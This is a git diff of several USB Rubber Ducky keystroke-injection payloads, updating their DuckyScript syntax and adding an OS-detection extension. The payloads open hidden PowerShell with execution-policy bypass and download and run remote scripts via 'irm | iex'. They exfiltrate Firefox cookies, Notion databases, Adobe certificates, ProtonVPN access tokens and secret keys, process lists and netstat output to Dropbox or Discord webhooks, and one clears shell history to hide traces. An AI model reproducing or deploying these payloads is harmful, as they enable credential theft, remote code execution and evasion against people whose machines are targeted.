STRING DROPBOX_FOLDER_NAME
|
||||
STRING "
|
||||
ENTER
|
||||
STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
|
||||
DELAY 500
|
||||
|
||||
DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
|
||||
STRING curl -X POST
|
||||
STRING DROPBOX_API_CONST
|
||||
STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
|
||||
ENTER
|
||||
STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
|
||||
|
||||
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM #### REMOVE TRACES ####
|
||||
|
||||
|
||||
STRING history -c
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
ENTER
|
||||
STRINGLN history -c; exit
|
|
@ -1,26 +1,66 @@
|
|||
REM ##########################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrate Process Info |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ##########################################
|
||||
REM_BLOCK
|
||||
##########################################
|
||||
# #
|
||||
# Title : Exfiltrate Process Info #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
##########################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet Connection
|
||||
REM - Dropbox Webhook
|
||||
|
||||
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
|
||||
DEFINE PAYLOAD example.com
|
||||
DEFINE #PAYLOAD example.com
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 250
|
||||
DELETE
|
||||
STRING powershell -w h -ep bypass irm
|
||||
STRING PAYLOAD
|
||||
STRING | iex
|
||||
ENTER
|
||||
STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex
|
||||
|
|
|
@ -33,17 +33,11 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
|
|||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Instagram
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Discord
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
|
|
@ -1,26 +1,68 @@
|
|||
REM #########################################################################
|
||||
REM # |
|
||||
REM # Title : Exfiltrates the entire database of the Notion client |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM #########################################################################
|
||||
|
||||
REM_BLOCK
|
||||
#########################################################################
|
||||
# #
|
||||
# Title : Exfiltrates the entire database of the Notion client #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
#########################################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Notion must be installed
|
||||
REM - Internet Connection
|
||||
|
||||
|
||||
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
||||
DEFINE #DROPBOX_ACCESS_TOKEN example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING PowerShell
|
||||
ENTER
|
||||
STRINGLN PowerShell
|
||||
DELAY 2000
|
||||
|
||||
REM Settings about Notion DB
|
||||
|
|
|
@ -1,31 +1,69 @@
|
|||
REM ####################################################
|
||||
REM # |
|
||||
REM # Title : Export Firefox Cookies Database |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ####################################################
|
||||
|
||||
REM_BLOCK
|
||||
####################################################
|
||||
# #
|
||||
# Title : Export Firefox Cookies Database #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
####################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Firefox must be installed
|
||||
|
||||
|
||||
REM You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
|
||||
DEFINE DROPBOX_ACCESS_TOKEN "example"
|
||||
DEFINE #DROPBOX_ACCESS_TOKEN "example"
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 1000
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 500
|
||||
ENTER
|
||||
STRINGLN powershell
|
||||
DELAY 2000
|
||||
|
||||
|
||||
REM Get cookies DB path
|
||||
STRINGLN
|
||||
$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
|
||||
|
@ -33,14 +71,8 @@ STRINGLN
|
|||
|
||||
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
|
||||
|
||||
END_STRINGLN
|
||||
$accessToken = #DROPBOX_ACCESS_TOKEN
|
||||
|
||||
REM Setting about exfiltration
|
||||
STRING $accessToken =
|
||||
STRING DROPBOX_ACCESS_TOKEN
|
||||
ENTER
|
||||
|
||||
STRINGLN
|
||||
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
|
||||
|
||||
$dropboxFilePath = "/cookies_exported.sqlite"
|
||||
|
|
|
@ -1,26 +1,68 @@
|
|||
REM ####################################################################
|
||||
REM # |
|
||||
REM # Title : Export all saved certificates with Adobe Reader |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ####################################################################
|
||||
|
||||
REM_BLOCK
|
||||
####################################################################
|
||||
# #
|
||||
# Title : Export all saved certificates with Adobe Reader #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
####################################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Adobe Reader must be installed
|
||||
REM - Internet Connection
|
||||
|
||||
|
||||
REM You must define your Dropbox accessToken or modify the exfiltration modality.
|
||||
DEFINE #DROPBOX_ACCESS_TOKEN example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
GUI r
|
||||
DELAY 1000
|
||||
STRING PowerShell
|
||||
STRINGLN PowerShell
|
||||
DELAY 2000
|
||||
|
||||
REM Settings about Adobe Reader
|
||||
|
|
|
@ -1,20 +1,63 @@
|
|||
REM ###########################################################
|
||||
REM # |
|
||||
REM # Title : Exports all the links of the downloads |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Windows 10/11 |
|
||||
REM # |
|
||||
REM ###########################################################
|
||||
|
||||
REM_BLOCK
|
||||
###########################################################
|
||||
# #
|
||||
# Title : Exports all the links of the downloads #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Windows 10/11 #
|
||||
# #
|
||||
###########################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Firefox installed
|
||||
|
||||
|
||||
REM You must define your Discord webhook if you want to use this method for the exfiltration
|
||||
DEFINE DISCORD_WEBHOOK example
|
||||
DEFINE #DISCORD_WEBHOOK example
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
REM Open Firefox
|
||||
GUI
|
||||
|
@ -49,9 +92,7 @@ DELAY 10000
|
|||
STRINGLN "
|
||||
|
||||
REM Exfiltration using Discord Webhook
|
||||
STRING $WebhookUrl = "
|
||||
STRING DISCORD_WEBHOOK
|
||||
STRINGLN "
|
||||
STRINGLN $WebhookUrl = "#DISCORD_WEBHOOK"
|
||||
|
||||
STRINGLN $Payload = @{content = $DOWNLOADS} | ConvertTo-Json
|
||||
|
||||
|
|
|
@ -1,43 +1,83 @@
|
|||
REM ###################################################################
|
||||
REM # |
|
||||
REM # Title : ProtonVPN-config-to-Discord-Exfiltration |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Credentials, Exfiltration |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###################################################################
|
||||
REM_BLOCK
|
||||
###################################################################
|
||||
# #
|
||||
# Title : ProtonVPN-config-to-Discord-Exfiltration #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Credentials, Exfiltration #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
###################################################################
|
||||
|
||||
REM Title: ProtonVPN-config-to-Discord-Exfiltration
|
||||
REM Author: Aleff
|
||||
REM Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||
REM In the config file you can find a lot information about the user like:
|
||||
REM - UserUid
|
||||
REM - UserAccessToken
|
||||
REM - UserRefreshToken
|
||||
REM - UserAuthenticationPublicKey
|
||||
REM - UserAuthenticationSecretKey
|
||||
REM - UserAuthenticationCertificatePem
|
||||
REM - UserCertificationServerPublicKey
|
||||
REM - and so on...
|
||||
REM Then it cleans up traces of what you have done after.
|
||||
REM Target: Windows 10-11 (PowerShell + ProtonVPN software)
|
||||
REM Version: 1.0
|
||||
REM Category: Credentials, Exfiltration
|
||||
REM Requirements: ProtonVPN user logged at least one time and internet connection
|
||||
REM
|
||||
Title: ProtonVPN-config-to-Discord-Exfiltration
|
||||
Author: Aleff
|
||||
Description: Opens PowerShell hidden, grabs ProtonVPN config file, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||
In the config file you can find a lot information about the user like:
|
||||
- UserUid
|
||||
- UserAccessToken
|
||||
- UserRefreshToken
|
||||
- UserAuthenticationPublicKey
|
||||
- UserAuthenticationSecretKey
|
||||
- UserAuthenticationCertificatePem
|
||||
- UserCertificationServerPublicKey
|
||||
- and so on...
|
||||
Then it cleans up traces of what you have done after.
|
||||
Target: Windows 10-11 (PowerShell + ProtonVPN software)
|
||||
Version: 1.0
|
||||
Category: Credentials, Exfiltration
|
||||
Requirements: ProtonVPN user logged at least one time and internet connection
|
||||
END_REM
|
||||
|
||||
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
|
||||
DEFINE #PAYLOAD example.com
|
||||
|
||||
REM REQUIRED - Provide your url WEBHOOK - https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||
DEFINE WEBHOOK example.com
|
||||
DEFINE #WEBHOOK example.com
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 250
|
||||
DELETE
|
||||
STRING powershell -w h -ep bypass $discord='
|
||||
STRING WEBHOOK
|
||||
|
||||
REM Reply example.com with YOUR LINK. The Payload should be ProtonVPN-config.ps1
|
||||
DEFINE PAYLOAD example.com
|
||||
STRING ';irm PAYLOAD | iex
|
||||
ENTER
|
||||
STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';irm #PAYLOAD | iex
|
||||
|
|
|
@ -41,17 +41,11 @@ I used the [DETECT_READY](https://shop.hak5.org/blogs/usb-rubber-ducky/detect-re
|
|||
</a>
|
||||
<br>Github
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Instagram
|
||||
</td>
|
||||
<td align="center" width="96">
|
||||
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
|
||||
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
|
||||
</a>
|
||||
<br>Discord
|
||||
<br>Linkedin
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
|
|
@ -1,12 +1,14 @@
|
|||
REM ###########################################################
|
||||
REM # |
|
||||
REM # Title : Tree Structure Of The Operating System |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Exfiltration |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###########################################################
|
||||
REM_BLOCK
|
||||
###########################################################
|
||||
# #
|
||||
# Title : Tree Structure Of The Operating System #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Exfiltration #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
###########################################################
|
||||
END_REM
|
||||
|
||||
REM Requirements:
|
||||
REM - Internet connection
|
||||
|
|
|
@ -1,45 +1,84 @@
|
|||
REM ###################################################################
|
||||
REM # |
|
||||
REM # Title : Windows-netstat-to-Discord-Exfiltration |
|
||||
REM # Author : Aleff |
|
||||
REM # Version : 1.0 |
|
||||
REM # Category : Net, Exfiltration |
|
||||
REM # Target : Windows 10-11 |
|
||||
REM # |
|
||||
REM ###################################################################
|
||||
REM_BLOCK
|
||||
###################################################################
|
||||
# #
|
||||
# Title : Windows-netstat-to-Discord-Exfiltration #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : Net, Exfiltration #
|
||||
# Target : Windows 10-11 #
|
||||
# #
|
||||
###################################################################
|
||||
|
||||
REM Title: Windows-netstat-to-Discord-Exfiltration
|
||||
REM Author: Aleff
|
||||
REM Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||
REM Put 1 on the function that you want to active, else 0. Functions available:
|
||||
REM - default (simple 'netstat' command)
|
||||
REM - routing_table $r
|
||||
REM - listening_canonical $lc
|
||||
REM - listening_numerical $ln
|
||||
REM - all_canonical $ac
|
||||
REM - all_numerical $an
|
||||
REM - offload ot
|
||||
REM - proto $p "<protocol>"
|
||||
REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
|
||||
Title: Windows-netstat-to-Discord-Exfiltration
|
||||
Author: Aleff
|
||||
Description: Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||
Put 1 on the function that you want to active, else 0. Functions available:
|
||||
- default (simple 'netstat' command)
|
||||
- routing_table $r
|
||||
- listening_canonical $lc
|
||||
- listening_numerical $ln
|
||||
- all_canonical $ac
|
||||
- all_numerical $an
|
||||
- offload ot
|
||||
- proto $p "<protocol>"
|
||||
- - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
|
||||
|
||||
REM Target: Windows 10-11 (PowerShell)
|
||||
REM Version: 1.0
|
||||
REM Category: Net, Exfiltration
|
||||
REM Requirements: Internet connection
|
||||
REM
|
||||
Target: Windows 10-11 (PowerShell)
|
||||
Version: 1.0
|
||||
Category: Net, Exfiltration
|
||||
Requirements: Internet connection
|
||||
END_REM
|
||||
|
||||
REM REQUIRED - Provide your Discord WEBHOOK
|
||||
DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||
DEFINE #WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
|
||||
|
||||
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
|
||||
DEFINE #PAYLOAD example.com
|
||||
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
REM VERSION 1.1
|
||||
REM AUTHOR: Korben
|
||||
|
||||
REM_BLOCK DOCUMENTATION
|
||||
Windows fully passive OS Detection and passive Detect Ready
|
||||
Includes its own passive detect ready.
|
||||
Does not require additional extensions.
|
||||
|
||||
USAGE:
|
||||
Extension runs inline (here)
|
||||
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||
boot delay
|
||||
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||
See end of payload for usage within payload
|
||||
END_REM
|
||||
|
||||
REM CONFIGURATION:
|
||||
DEFINE #MAX_WAIT 150
|
||||
DEFINE #CHECK_INTERVAL 20
|
||||
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||
DEFINE #NOT_WINDOWS 7
|
||||
|
||||
$_OS = #NOT_WINDOWS
|
||||
|
||||
VAR $MAX_TRIES = #MAX_WAIT
|
||||
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||
DELAY #CHECK_INTERVAL
|
||||
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||
END_WHILE
|
||||
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||
$_OS = WINDOWS
|
||||
END_IF
|
||||
|
||||
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||
IF ($_OS == WINDOWS) THEN
|
||||
STRING HELLO WINDOWS!
|
||||
ELSE
|
||||
STRING HELLO WORLD!
|
||||
END_IF
|
||||
END_REM
|
||||
END_EXTENSION
|
||||
|
||||
DELAY 2000
|
||||
GUI r
|
||||
DELAY 250
|
||||
DELETE
|
||||
STRING powershell -w h -ep bypass $discord='
|
||||
|
||||
STRING WEBHOOK
|
||||
|
||||
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
|
||||
DEFINE PAYLOAD example.com
|
||||
STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
|
||||
ENTER
|
||||
STRINGLN powershell -w h -ep bypass $discord='#WEBHOOK';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm #PAYLOAD | iex
|
||||
|
|
|
@ -1,13 +1,14 @@
|
|||
REM #############################################################################################
|
||||
REM # #
|
||||
REM # Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
|
||||
REM # Author : Aleff #
|
||||
REM # Version : 1.0 #
|
||||
REM # Category : incident-response #
|
||||
REM # Target : Cisco IOS XE #
|
||||
REM # #
|
||||
REM #############################################################################################
|
||||
|
||||
REM_BLOCK
|
||||
#############################################################################################
|
||||
# #
|
||||
# Title : Auto-Check Cisco IOS XE Backdoor based on CVE-2023-20198 and CVE-2023-20273 #
|
||||
# Author : Aleff #
|
||||
# Version : 1.0 #
|
||||
# Category : incident-response #
|
||||
# Target : Cisco IOS XE #
|
||||
# #
|
||||
#############################################################################################
|
||||
END_REM
|
||||
|
||||
REM Set the script name, the default name is auto-check.sh but you can change it here since is used the DuckyScript variable #SCRIPT-NAME.
|
||||
DEFINE #SCRIPT-NAME auto-check.sh
|
||||
|
@ -75,17 +76,17 @@ STRINGLN
|
|||
done' > #PATH-TO-SCRIPT#SCRIPT-NAME
|
||||
END_STRINGLN
|
||||
|
||||
|
||||
|
||||
REM To avoid some bad DELAY I decided to use only one command row
|
||||
|
||||
REM Old script
|
||||
REM STRINGLN sudo chmod +x #SCRIPT-NAME
|
